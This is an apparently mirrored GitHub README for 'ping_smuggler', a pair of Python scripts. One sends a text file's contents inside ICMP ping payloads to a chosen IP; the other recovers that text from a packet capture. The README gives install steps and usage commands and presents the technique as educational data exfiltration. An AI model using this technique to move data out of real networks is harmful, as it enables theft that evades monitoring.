Giters

hercules261188 / ping_smuggler

Concept script to demonstrate how to exfiltrate data inside of ping packets

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Ping Smuggler

Overview

Disclaimer: this tool is for educational purposes only

This tool is a set of scripts which will send data from a text via via ICMP payload. This project consists of two Python scripts:

  1. Ping Generator (ping_generator.py): This script generates ICMP ping messages, embedding the contents of a text file into the ICMP payload and sends them to a specified destination.
  2. Ping Parser (ping_parser.py): This script reads a PCAP file containing ICMP messages generated by the Ping Generator and extracts the text payload from these messages, converting it into plain text.

Requirements

  1. Python: Python 3.x is required to run these scripts.
  2. Operating System: The Ping Generator script is designed for Linux systems due to its dependency on scapy, which works best on Linux.
  3. Scapy: The Ping Generator script uses the scapy library for packet creation and manipulation. Installation: Install scapy using pip:
pip install scapy

Note: scapy requires administrative (sudo) privileges to send packets.

  1. tshark: The ICMP Payload Parser script uses tshark (via pyshark) for parsing PCAP files. Installation:
  • Linux: Install using your package manager, e.g., sudo apt-get install tshark.
  • Windows: Download and install Wireshark, which includes tshark, from Wireshark's official website. Ensure tshark is in your system's PATH.
  1. Pyshark:

The ICMP Payload Parser script requires pyshark, a Python wrapper for tshark. Installation: Install pyshark using pip:

bash

pip install pyshark

Usage

Ping Generator (ping_generator.py):

Usage: sudo python3 ping_generator.py [destination IP] [file path]

Sends ICMP packets containing text from the specified file to the given destination IP. Requires administrative privileges to execute.

ICMP Payload Parser (icmp_parser.py):

Usage: python3 ping_parser.py path_to_your_pcap_file.pcap

Parses the specified PCAP file and extracts ASCII text from ICMP payloads. Ensure the PCAP file contains ICMP packets generated by the Ping Generator script.

Notes

  • These scripts are for educational and testing purposes only. Ensure you have permission to send and capture ICMP packets in your network.
  • The Ping Generator script's functionality is network-dependent and may not work as expected in all environments, especially those with ICMP restrictions.

About

Concept script to demonstrate how to exfiltrate data inside of ping packets

Languages

Language:Python 100.0%